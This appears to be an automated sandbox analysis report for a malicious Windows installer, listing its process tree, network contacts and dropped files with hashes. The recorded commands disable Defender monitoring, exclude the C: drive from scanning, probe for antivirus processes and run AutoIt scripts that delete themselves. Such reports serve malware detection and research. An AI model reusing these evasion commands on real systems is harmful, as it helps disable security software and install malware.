C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command "Set-MpPreference -Force -DisableBehaviorMonitoring "' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:"

C:\Windows\SysWOW64\explorer.exe

explorer C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe

"C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe"

C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp" /SL5="$8030A,10740751,812544,C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe"

C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe

"C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe" /VERYSILENT /NORESTART

C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp

"C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp" /SL5="$9030A,10740751,812544,C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe" /VERYSILENT /NORESTART

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "wrsa.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "opssvc.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "avastui.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "avgui.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "nswscsvc.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "sophoshealth.exe"

C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe

"C:\Users\Admin\AppData\Local\acetiam\\AutoIt3.exe" "C:\Users\Admin\AppData\Local\acetiam\\grayhound1..a3x"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && AutoIt3.exe C:\ProgramData\\9TjdUm.a3x && del C:\ProgramData\\9TjdUm.a3x

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe

AutoIt3.exe C:\ProgramData\\9TjdUm.a3x

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
DE 78.47.101.48:80 78.47.101.48 tcp
US 8.8.8.8:53 48.101.47.78.in-addr.arpa udp
RU 89.23.96.126:80 89.23.96.126 tcp
NL 149.154.167.99:443 t.me tcp
RU 89.23.96.126:80 89.23.96.126 tcp
DE 78.47.101.48:443 78.47.101.48 tcp
RU 89.23.96.126:80 89.23.96.126 tcp
RU 89.23.96.126:80 89.23.96.126 tcp
RU 45.141.86.82:15647 tcp
RU 45.141.86.82:9000 45.141.86.82 tcp

Files

memory/2588-0-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2588-2-0x0000000000401000-0x0000000000417000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp

MD5 2e5268d21ee1d98eccf3b34eec423da1
SHA1 8a2438cd614bb41e25840bd2d4093624340340c1
SHA256 16eb4e42a9368653bd9d53fe8bde815fe87c597239f36b662cc96dbc007200b7
SHA512 aad98865430deca874beff456d349e640caaf9969726f1b279995d4eff41efd77e422c43e739af245f7e7ab5e6f970b4b10a8ef40681621a419b533da002fe94

C:\Users\Admin\AppData\Local\Temp\is-FKM89.tmp\idp.dll

MD5 55c310c0319260d798757557ab3bf636
SHA1 0892eb7ed31d8bb20a56c6835990749011a2d8de
SHA256 54e7e0ad32a22b775131a6288f083ed3286a9a436941377fc20f85dd9ad983ed
SHA512 e0082109737097658677d7963cbf28d412dca3fa8f5812c2567e53849336ce45ebae2c0430df74bfe16c0f3eebb46961bc1a10f32ca7947692a900162128ae57

memory/3748-11-0x0000000000400000-0x0000000000588000-memory.dmp

memory/2588-31-0x0000000000400000-0x000000000043C000-memory.dmp

memory/3748-32-0x0000000000400000-0x0000000000588000-memory.dmp

memory/3748-33-0x0000000000400000-0x0000000000588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\interim.cmd

MD5 5eb56a3d2bf812380982b715d6c76e4b
SHA1 42e24481c1f1dd3f18d8396eec6570e2c05d17ce
SHA256 9008812fe85e22ae3e3c394568d449cb78d252a403c4950ed181007542acd23c
SHA512 8d21ab65128c9070d0f31a91561f65d3c3eb6d9c36d2ff73f7b80e4de63a18d14c8512d58da565919f95cd594e2df45762153ae216bc6cd1cefd53a8dd005cf2

memory/3748-276-0x0000000000400000-0x0000000000588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe

MD5 0f2614f9e5ce56e869691391776aae9e
SHA1 858e326195413db11adc894f10d16a2bd087ecef
SHA256 44dbf9913a950bfea77e8fceb3c15b802733a6a6c7942f6b6ee05d17afba521a
SHA512 80d7233a64d69c474bf8b46728801396c97c9089c64b26218d5bfad096cc39dbe9f67bf942aecbe721b5dc345bd99968b39da4fc20cd006c75c258cc2ec38de7

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\i386\jvm.cfg

MD5 9fd47c1a487b79a12e90e7506469477b
SHA1 7814df0ff2ea1827c75dcd73844ca7f025998cc6
SHA256 a73aea3074360cf62adedc0c82bc9c0c36c6a777c70da6c544d0fba7b2d8529e
SHA512 97b9d4c68ac4b534f86efa9af947763ee61aee6086581d96cbf7b3dbd6fd5d9db4b4d16772dce6f347b44085cef8a6ea3bfd3b84fbd9d4ef763cef39255fbce3

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\msvcr100.dll

MD5 bf38660a9125935658cfa3e53fdc7d65
SHA1 0b51fb415ec89848f339f8989d323bea722bfd70
SHA256 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa
SHA512 25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\client\jvm.dll

MD5 39c302fe0781e5af6d007e55f509606a
SHA1 23690a52e8c6578de6a7980bb78aae69d0f31780
SHA256 b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc
SHA512 67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\java.dll

MD5 73bd0b62b158c5a8d0ce92064600620d
SHA1 63c74250c17f75fe6356b649c484ad5936c3e871
SHA256 e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30
SHA512 eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\meta-index

MD5 91aa6ea7320140f30379f758d626e59d
SHA1 3be2febe28723b1033ccdaa110eaf59bbd6d1f96
SHA256 4af21954cdf398d1eae795b6886ca2581dac9f2f1d41c98c6ed9b5dbc3e3c1d4
SHA512 03428803f1d644d89eb4c0dcbdea93acaac366d35fc1356ccabf83473f4fef7924edb771e44c721103cec22d94a179f092d1bfd1c0a62130f076eb82a826d7cb

memory/2720-300-0x0000000000400000-0x0000000000415000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\zip.dll

MD5 cb99b83bbc19cd0e1c2ec6031d0a80bc
SHA1 927e1e24fd19f9ca8b5191ef3cc746b74ab68bcd
SHA256 68148243e3a03a3a1aaf4637f054993cb174c04f6bd77894fe84d74af5833bec
SHA512 29c4978fa56f15025355ce26a52bdf8197b8d8073a441425df3dfc93c7d80d36755cc05b6485dd2e1f168df2941315f883960b81368e742c4ea8e69dd82fa2ba

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\verify.dll

MD5 de2167a880207bbf7464bcd1f8bc8657
SHA1 0ff7a5ea29c0364a1162a090dffc13d29bc3d3c7
SHA256 fd856ea783ad60215ce2f920fcb6bb4e416562d3c037c06d047f1ec103cd10b3
SHA512 bb83377c5cff6117cec6fbadf6d40989ce1ee3f37e4ceba17562a59ea903d8962091146e2aa5cc44cfdddf280da7928001eea98abf0c0942d69819b2433f1322

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe

MD5 48c96771106dbdd5d42bba3772e4b414
SHA1 e84749b99eb491e40a62ed2e92e4d7a790d09273
SHA256 a96d26428942065411b1b32811afd4c5557c21f1d9430f3696aa2ba4c4ac5f22
SHA512 9f891c787eb8ceed30a4e16d8e54208fa9b19f72eeec55b9f12d30dc8b63e5a798a16b1ccc8cea3e986191822c4d37aedb556e534d2eb24e4a02259555d56a2c

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\ext\meta-index

MD5 77abe2551c7a5931b70f78962ac5a3c7
SHA1 a8bb53a505d7002def70c7a8788b9a2ea8a1d7bc
SHA256 c557f0c9053301703798e01dc0f65e290b0ae69075fb49fcc0e68c14b21d87f4
SHA512 9fe671380335804d4416e26c1e00cded200687db484f770ebbdb8631a9c769f0a449c661cb38f49c41463e822beb5248e69fd63562c3d8c508154c5d64421935

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\asm-all.jar

MD5 f5ad16c7f0338b541978b0430d51dc83
SHA1 2ea49e08b876bbd33e0a7ce75c8f371d29e1f10a
SHA256 7fbffbc1db3422e2101689fd88df8384b15817b52b9b2b267b9f6d2511dc198d
SHA512 82e6749f4a6956f5b8dd5a5596ca170a1b7ff4e551714b56a293e6b8c7b092cbec2bec9dc0d9503404deb8f175cbb1ded2e856c6bc829411c8ed311c1861336a

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\activation.jar

MD5 46a37512971d8eca81c3fcf245bf07d2
SHA1 485de3a253e23f645037828c07f1d7f1af40763a
SHA256 ae475120e9fcd99b4b00b38329bd61cdc5eb754eee03fe66c01f50e137724f99
SHA512 49119b0cc3af02700685a55c6f15e6d40643f81640e642b9ea39a59e18d542f8837d30b43b5be006ce1a98c8ec9729bb2165c0442978168f64caa2fc6e3cb93d

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-gui-jfoenix-ext.jar

MD5 d093f94c050d5900795de8149cb84817
SHA1 54058dda5c9e66a22074590072c8a48559bba1fb
SHA256 4bec0794a0d69debe2f955bf495ea7c0858ad84cb0d2d549cacb82e70c060cba
SHA512 3faaa415fba5745298981014d0042e8e01850fccaac22f92469765fd8c56b920da877ff3138a629242d9c52e270e7e2ce89e7c69f6902859f48ea0359842e2fb

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\ext\jfxrt.jar

MD5 042b3675517d6a637b95014523b1fd7d
SHA1 82161caf5f0a4112686e4889a9e207c7ba62a880
SHA256 a570f20f8410f9b1b7e093957bf0ae53cae4731afaea624339aa2a897a635f22
SHA512 7672d0b50a92e854d3bd3724d01084cc10a90678b768e9a627baf761993e56a0c6c62c19155649fe9a8ceeabf845d86cbbb606554872ae789018a8b66e5a2b35

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-runtime.jar

MD5 d5ef47c915bef65a63d364f5cf7cd467
SHA1 f711f3846e144dddbfb31597c0c165ba8adf8d6b
SHA256 9c287472408857301594f8f7bda108457f6fdae6e25c87ec88dbf3012e5a98b6
SHA512 04aeb956bfcd3bd23b540f9ad2d4110bb2ffd25fe899152c4b2e782daa23a676df9507078ecf1bfc409ddfbe2858ab4c4c324f431e45d8234e13905eb192bae8

memory/2104-346-0x0000000000910000-0x0000000000911000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-mail-ext.jar

MD5 405861c5544a92fb345ebca30dcaec2d
SHA1 f8fe5dcb597fff1bf6489f1283a0157be1a313c3
SHA256 fb206af4ddcc568eb1f7b38b7266be683167c95befef797b0965b4533647b17d
SHA512 f1330e5b39a2af8cf378172d9311a50b65aaa7d0c793b354efbcaa3c843bddeffb756a50f1cb9adaf974c3bb3fa6b5ef4b779e1efeeeb1b3946605f47053fe03

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-jsoup-ext.jar

MD5 d963210c02cd1825e967086827da8294
SHA1 26c4d004b5ffdb8f81de2d6b158a3f34819faf01
SHA256 7908145cf17301bedefd6e3af8c93e0320582c0562919ffb56cc21b7fd532b96
SHA512 756c21dc1a02d579f0e2ed39e5bedca5491087cdc28e3e96c8663a493bcfeeeeea44dc40681ec6341426dfa995883dbce11b76d1f921e043ae220399a9e554fb

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-json-ext.jar

MD5 fde38932b12fc063451af6613d4470cc
SHA1 bc08c114681a3afc05fb8c0470776c3eae2eefeb
SHA256 9967ea3c3d1aee8db5a723f714fba38d2fc26d8553435ab0e1d4e123cd211830
SHA512 0f211f81101ced5fff466f2aab0e6c807bb18b23bc4928fe664c60653c99fa81b34edf5835fcc3affb34b0df1fa61c73a621df41355e4d82131f94fcc0b0e839

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-gui-ext.jar

MD5 6696368a09c7f8fed4ea92c4e5238cee
SHA1 f89c282e557d1207afd7158b82721c3d425736a7
SHA256 c25d7a7b8f0715729bccb817e345f0fdd668dd4799c8dab1a4db3d6a37e7e3e4
SHA512 0ab24f07f956e3cdcd9d09c3aa4677ff60b70d7a48e7179a02e4ff9c0d2c7a1fc51624c3c8a5d892644e9f36f84f7aaf4aa6d2c9e1c291c88b3cff7568d54f76

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-desktop-hotkey-ext.jar

MD5 22acc05e1efc1d4c5faa0359ce725d47
SHA1 458e7f911d024a3d786e76f256b017b0901f48f8
SHA256 c55c267d954ec9f24226780ee49fa7e1bc2baec3af6bfc0caa6cc1b49d8ca90c
SHA512 b11754f5337a73d317ae311fd4c20c0b548e1163107b741cc9e6d4d9027a8f99551e3184a83f9ad20098092e87ef1741c1e437058b7cac92727124589c303ef5

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-desktop-ext.jar

MD5 b50e2c75f5f0e1094e997de8a2a2d0ca
SHA1 d789eb689c091536ea6a01764bada387841264cb
SHA256 cf4068ebb5ecd47adec92afba943aea4eb2fee40871330d064b69770cccb9e23
SHA512 57d8ac613805edada6aeba7b55417fd7d41c93913c56c4c2c1a8e8a28bbb7a05aade6e02b70a798a078dc3c747967da242c6922b342209874f3caf7312670cb0

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-core.jar

MD5 7e5e3d6d352025bd7f093c2d7f9b21ab
SHA1 ad9bfc2c3d70c574d34a752c5d0ebcc43a046c57
SHA256 5b37e8ff2850a4cbb02f9f02391e9f07285b4e0667f7e4b2d4515b78e699735a
SHA512 c19c29f8ad8b6beb3eed40ab7dc343468a4ca75d49f1d0d4ea0b4a5cee33f745893fba764d35c8bd157f7842268e0716b1eb4b8b26dcf888fb3b3f4314844aad

memory/2104-350-0x0000000000910000-0x0000000000911000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-app-framework.jar

MD5 0c8768cdeb3e894798f80465e0219c05
SHA1 c4da07ac93e4e547748ecc26b633d3db5b81ce47
SHA256 15f36830124fc7389e312cf228b952024a8ce8601bf5c4df806bc395d47db669
SHA512 35db507a3918093b529547e991ab6c1643a96258fc95ba1ea7665ff762b0b8abb1ef732b3854663a947effe505be667bd2609ffcccb6409a66df605f971da106

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jna.jar

MD5 8d536ddbe44d1500d262960891911f91
SHA1 fcc5b10cb812c41b00708e7b57baccc3aee5567c
SHA256 edc2a2c4f9b0b55fdc66aef3c9a9ddfff97e4b892842d4c0e1bc6eaff704abcb
SHA512 0ff97f158d1b1fbbef35813a1be2cc9f0c2321fa66e47af3276d3cb93178e668a652bac8a1aee82986dbf86e6db34518045eddfdd10ca827f3e4762faaa814f3

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jkeymaster.jar

MD5 21a017201cbb16ae0546069d4371f1c2
SHA1 9f1e8c9341a8a0c51299b961c4f6c7661c822756
SHA256 a2d68aaf08f15ff1c3b9b224641e8b4c35ee30b10f655d6420571b0429f19c87
SHA512 6c65740c17de72ba7b0df95aa29d095a1502f298924c63f364328f6fbb38920e92e0246d28a642f7c9fe3ab582341e607b0ae01515d470b4595d698ce81363d6

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jfoenix.jar

MD5 6316f84bc78d40b138dab1adc978ca5d
SHA1 b12ea05331ad89a9b09937367ebc20421f17b9ff
SHA256 d637e3326f87a173abd5f51ac98906a3237b9e511d07d31d6aafcf43f33dac17
SHA512 1cdca01ed9c2bc607207c8c51f4b532f4153e94b3846308332eccae25f9c5fddf8279e3063f44a75dd43d696eab0f9f340f9bf2f3ec805ab0f2f1de5135a426c

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\gson.jar

MD5 5134a2350f58890ffb9db0b40047195d
SHA1 751f548c85fa49f330cecbb1875893f971b33c4e
SHA256 2d43eb5ea9e133d2ee2405cc14f5ee08951b8361302fdd93494a3a997b508d32
SHA512 c3cdaf66a99e6336abc80ff23374f6b62ac95ab2ae874c9075805e91d849b18e3f620cc202b4978fc92b73d98de96089c8714b1dd096b2ae1958cfa085715f7a

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\dn-php-sdk.jar

MD5 3e5e8cccff7ff343cbfe22588e569256
SHA1 66756daa182672bff27e453eed585325d8cc2a7a
SHA256 0f26584763ef1c5ec07d1f310f0b6504bc17732f04e37f4eb101338803be0dc4
SHA512 8ea5f31e25c3c48ee21c51abe9146ee2a270d603788ec47176c16acac15dad608eef4fa8ca0f34a1bbc6475c29e348bd62b0328e73d2e1071aaa745818867522

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\dn-compiled-module.jar

MD5 54449c8b4cd5c7b633a21b2cce60c950
SHA1 fb5c09f36f52ab97faefcf726d14504149f82829
SHA256 2f905c6458fb53d5e4d32ddf251c9bfe669054307031b294828f09ba33a97f81
SHA512 9161897d891d30085518ec92b4294f929ba261a0334e1a4ddfdebe106fd3b991a87b1ac14029265f293172102ae308a7c4b757f37cfedff6abcfc32d85baf85b

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\commons-email.jar

MD5 f045afea3cb27ead50b0c59fc3f0dffd
SHA1 c1a7133db9008fa1eae082e6158c3f4c128ec27e
SHA256 268253139a8936afa68909df8ced52a9d769665ee9373a60e19a93f254fd54b5
SHA512 0e2d2cbef9d4c19310748e37ad909e57aa37490a7dfd41557b1914857fe7235e434a6fdee00f663688941da3e70fe882b5c63df10ba8c7ad18936959f906722b

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-systemtray-ext.jar

MD5 acc229916e4c7c666b45072b525041e7
SHA1 36f508f20347fce608130806a26cd796daf5dd20
SHA256 91ed39e83199784b0fb359a9e2b319572b2ba1b1f4492e82a590bf488650f7f4
SHA512 c537c442874c63103f5ae934b6fdd03834e62b7374070efcbcd05b606d02274679078c38437cb1de79e3284f39fc2981c79274d93b0ba4afeb7c6942cca54235

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-xml-ext.jar

MD5 0a79304556a1289aa9e6213f574f3b08
SHA1 7ee3bde3b1777bf65d4f62ce33295556223a26cd
SHA256 434e57fffc7df0b725c1d95cabafdcdb83858ccb3e5e728a74d3cf33a0ca9c79
SHA512 1560703d0c162d73c99cef9e8ddc050362e45209cc8dea6a34a49e2b6f99aae462eae27ba026bdb29433952b6696896bb96998a0f6ac0a3c1dbbb2f6ebc26a7e

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-zend-ext.jar

MD5 4bc2aea7281e27bc91566377d0ed1897
SHA1 d02d897e8a8aca58e3635c009a16d595a5649d44
SHA256 4aef566bbf3f0b56769a0c45275ebbf7894e9ddb54430c9db2874124b7cea288
SHA512 da35bb2f67bca7527dc94e5a99a162180b2701ddca2c688d9e0be69876aca7c48f192d0f03d431ccd2d8eec55e0e681322b4f15eba4db29ef5557316e8e51e10

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-zip-ext.jar

MD5 20f6f88989e806d23c29686b090f6190
SHA1 1fdb9a66bb5ca587c05d3159829a8780bb66c87d
SHA256 9d5f06d539b91e98fd277fc01fd2f9af6fea58654e3b91098503b235a83abb16
SHA512 2798bb1dd0aa121cd766bd5b47d256b1a528e9db83ed61311fa685f669b7f60898118ae8c69d2a30d746af362b810b133103cbe426e0293dd2111aca1b41ccea

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jsoup.jar

MD5 36145fee38e79b81035787f1be296a52
SHA1 33ee82e324f4b1e40167f3dc5e01234a1c5cab61
SHA256 6ebe6abd7775c10a49407ae22db45c840cd2cdaf715866a5b0b5af70941c3f4a
SHA512 3b00b07320831f075a6af9ac1863b8756fe4f99a1b4f2e53578dca17fdaf7bdb147279225045e9eeeba4898fe321cf5457832b8e6a1a5b71acff9a1c10392659

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\mail.jar

MD5 ec6e4e5ebd85a221b395b8f3b37545e6
SHA1 85319c87280f30e1afc54c355f91f44741beac49
SHA256 17bddec86cfe01092bd358c249b7c2ce4295c13cdad314d8eacc8426fdbe3034
SHA512 3e3e406542676f27b5008a061ceaa90580e2f9fd78b31576c99f7612033f2dd0a14824e7bfb16e6f1a12ad96985319fd6f1c2706230019c76ce22da8c7dfd181

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\currency.data

MD5 f6258230b51220609a60aa6ba70d68f3
SHA1 b5b95dd1ddcd3a433db14976e3b7f92664043536
SHA256 22458853da2415f7775652a7f57bb6665f83a9ae9fb8bd3cf05e29aac24c8441
SHA512 b2dfcfdebf9596f2bb05f021a24335f1eb2a094dca02b2d7dd1b7c871d5eecda7d50da7943b9f85edb5e92d9be6b6adfd24673ce816df3960e4d68c7f894563f

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\slf4j-api.jar

MD5 caafe376afb7086dcbee79f780394ca3
SHA1 da76ca59f6a57ee3102f8f9bd9cee742973efa8a
SHA256 18c4a0095d5c1da6b817592e767bb23d29dd2f560ad74df75ff3961dbde25b79
SHA512 5dd6271fd5b34579d8e66271bab75c89baca8b2ebeaa9966de391284bd08f2d720083c6e0e1edda106ecf8a04e9a32116de6873f0f88c19c049c0fe27e5d820b

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\slf4j-simple.jar

MD5 722bb90689aecc523e3fe317e1f0984b
SHA1 8dacf9514f0c707cbbcdd6fd699e8940d42fb54e
SHA256 0966e86fffa5be52d3d9e7b89dd674d98a03eed0a454fbaf7c1bd9493bd9d874
SHA512 d5effbfa105bcd615e56ef983075c9ef0f52bcfdbefa3ce8cea9550f25b859e48b32f2ec9aa7a305c6611a3be5e0cde0d269588d9c2897ca987359b77213331d

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\zt-zip.jar

MD5 0fd8bc4f0f2e37feb1efc474d037af55
SHA1 add8fface4c1936787eb4bffe4ea944a13467d53
SHA256 1e31ef3145d1e30b31107b7afc4a61011ebca99550dce65f945c2ea4ccac714b
SHA512 29de5832db5b43fdc99bb7ea32a7359441d6cf5c05561dd0a6960b33078471e4740ee08ffbd97a5ced4b7dd9cc98fad6add43edb4418bf719f90f83c58188149

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\security\java.security

MD5 409c132fe4ea4abe9e5eb5a48a385b61
SHA1 446d68298be43eb657934552d656fa9ae240f2a2
SHA256 4d9e5a12b8cac8b36ecd88468b1c4018bc83c97eb467141901f90358d146a583
SHA512 7fed286ac9aed03e2dae24c3864edbbf812b65965c7173cc56ce622179eb5f872f77116275e96e1d52d1c58d3cdebe4e82b540b968e95d5da656aa74ad17400d

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\jsse.jar

MD5 fd1434c81219c385f30b07e33cef9f30
SHA1 0b5ee897864c8605ef69f66dfe1e15729cfcbc59
SHA256 bc3a736e08e68ace28c68b0621dccfb76c1063bd28d7bd8fce7b20e7b7526cc5
SHA512 9a778a3843744f1fabad960aa22880d37c30b1cab29e123170d853c9469dc54a81e81a9070e1de1bf63ba527c332bb2b1f1d872907f3bdce33a6898a02fef22d

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\net.dll

MD5 691b937a898271ee2cffab20518b310b
SHA1 abedfcd32c3022326bc593ab392dea433fcf667c
SHA256 2f5f1199d277850a009458edb5202688c26dd993f68fe86ca1b946dc74a36d61
SHA512 1c09f4e35a75b336170f64b5c7254a51461dc1997b5862b62208063c6cf84a7cb2d66a67e947cbbf27e1cf34ccd68ba4e91c71c236104070ef3beb85570213ec

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\nio.dll

MD5 95edb3cb2e2333c146a4dd489ce67cbd
SHA1 79013586a6e65e2e1f80e5caf9e2aa15b7363f9a
SHA256 96cf590bddfd90086476e012d9f48a9a696efc054852ef626b43d6d62e72af31
SHA512 ab671f1bce915d748ee49518cc2a666a2715b329cab4ab8f6b9a975c99c146bb095f7a4284cd2aaf4a5b4fcf4f939f54853af3b3acc4205f89ed2ba8a33bb553

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\tzdb.dat

MD5 5a7f416bd764e4a0c2deb976b1d04b7b
SHA1 e12754541a58d7687deda517cdda14b897ff4400
SHA256 a636afa5edba8aa0944836793537d9c5b5ca0091ccc3741fc0823edae8697c9d
SHA512 3ab2ad86832b98f8e5e1ce1c1b3ffefa3c3d00b592eb1858e4a10fff88d1a74da81ad24c7ec82615c398192f976a1c15358fce9451aa0af9e65fb566731d6d8f

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\tzmappings

MD5 b8dd8953b143685b5e91abeb13ff24f0
SHA1 b5ceb39061fce39bb9d7a0176049a6e2600c419c
SHA256 3d49b3f2761c70f15057da48abe35a59b43d91fa4922be137c0022851b1ca272
SHA512 c9cd0eb1ba203c170f8196cbab1aaa067bcc86f2e52d0baf979aad370edf9f773e19f430777a5a1c66efe1ec3046f9bc82165acce3e3d1b8ae5879bd92f09c90

